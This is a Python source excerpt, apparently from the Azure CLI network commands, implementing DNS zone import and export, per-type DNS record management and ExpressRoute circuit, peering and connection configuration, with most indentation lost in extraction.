zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
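# Sketch of the record-set bookkeeping used in import_zone above: the dictionary key packs the
# FQDN (which keeps its trailing dot) together with the record type, and rsplit('.', 1) recovers
# both parts later. The _demo_record_set_key helper and the sample zone name are hypothetical.
def _demo_record_set_key():
    record_set_name, record_set_type = 'www.contoso.com.', 'a'
    key = '{}{}'.format(record_set_name.lower(), record_set_type)
    rs_name, rs_type = key.rsplit('.', 1)
    assert (rs_name, rs_type) == ('www.contoso.com', 'a')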
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name, 'arecords',
ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
    long_text = ''.join(record.value)
original_len = len(long_text)
record.value = []
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
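# Standalone sketch of the 255-character chunking performed above, which keeps each TXT
# character-string within the DNS limit while preserving the full text. The _demo_chunk_txt
# helper is hypothetical and is not used by the command.
def _demo_chunk_txt(text, limit=255):
    original = text
    chunks = []
    while len(text) > limit:
        chunks.append(text[:limit])
        text = text[limit:]
    chunks.append(text)
    assert ''.join(chunks) == original  # the text round-trips without losing characters
    return chunks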
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
return globals()["_check_{}_record_exist".format(record_type)]
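# Illustration of the globals()-based dispatch above: the record type is interpolated into the
# checker name and resolved against module globals. The _demo_record_exist_dispatch helper is
# hypothetical and only spot-checks the lookup.
def _demo_record_exist_dispatch():
    assert _record_exist_func('a') is _check_a_record_exist
    assert _record_exist_func('mx') is _check_mx_record_exist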
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
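# Sketch of _add_record semantics using bare namespaces instead of SDK record sets (illustrative
# only; the _demo_add_record helper and sample values are hypothetical). List-valued types
# accumulate and de-duplicate via the _check_*_record_exist helpers; scalar types simply overwrite.
def _demo_add_record():
    from types import SimpleNamespace
    record_set = SimpleNamespace(a_records=None, cname_record=None)
    _add_record(record_set, SimpleNamespace(ipv4_address='10.0.0.4'), 'a', is_list=True)
    _add_record(record_set, SimpleNamespace(ipv4_address='10.0.0.4'), 'a', is_list=True)
    assert len(record_set.a_records) == 1  # the duplicate A record was not appended
    _add_record(record_set, SimpleNamespace(cname='www.contoso.com'), 'cname', is_list=False)
    assert record_set.cname_record.cname == 'www.contoso.com'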
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
    if is_list:
        records_remaining = len(getattr(record_set, record_property) or [])
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
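# Spot checks for the matching helpers above (illustrative only; _demo_dict_matches_filter is
# hypothetical): falsy filter values act as wildcards, and present values are compared as strings.
def _demo_dict_matches_filter():
    existing = {'ipv4_address': '10.0.0.4', 'ttl': 3600}
    assert dict_matches_filter(existing, {'ipv4_address': '10.0.0.4'})
    assert dict_matches_filter(existing, {'ipv4_address': None})
    assert not dict_matches_filter(existing, {'ipv4_address': '10.0.0.5'})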
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
if cmd.supported_api_version(min_api='2010-07-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
            instance.service_provider_properties.bandwidth_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def set_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name, connection_name,
address_prefix):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
Ipv6CircuitConnectionConfig = cmd.get_models('Ipv6CircuitConnectionConfig')
ipv6_config = Ipv6CircuitConnectionConfig(
address_prefix=address_prefix
)
conn.ipv6_circuit_connection_config = ipv6_config
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def remove_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name,
connection_name):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
conn.ipv6_circuit_connection_config = None
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
return version == IPv6Network
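# Spot checks for the prefix validation above (illustrative only; _demo_validate_prefix_version
# is hypothetical): a homogeneous list is classified by IP version and a bare string is accepted.
def _demo_validate_prefix_version():
    assert _validate_ipv6_address_prefixes(['2001:db8::/64', '2001:db8:1::/64']) is True
    assert _validate_ipv6_address_prefixes('10.0.0.0/24') is False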
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
    ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable = cmd.get_models(
        'ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
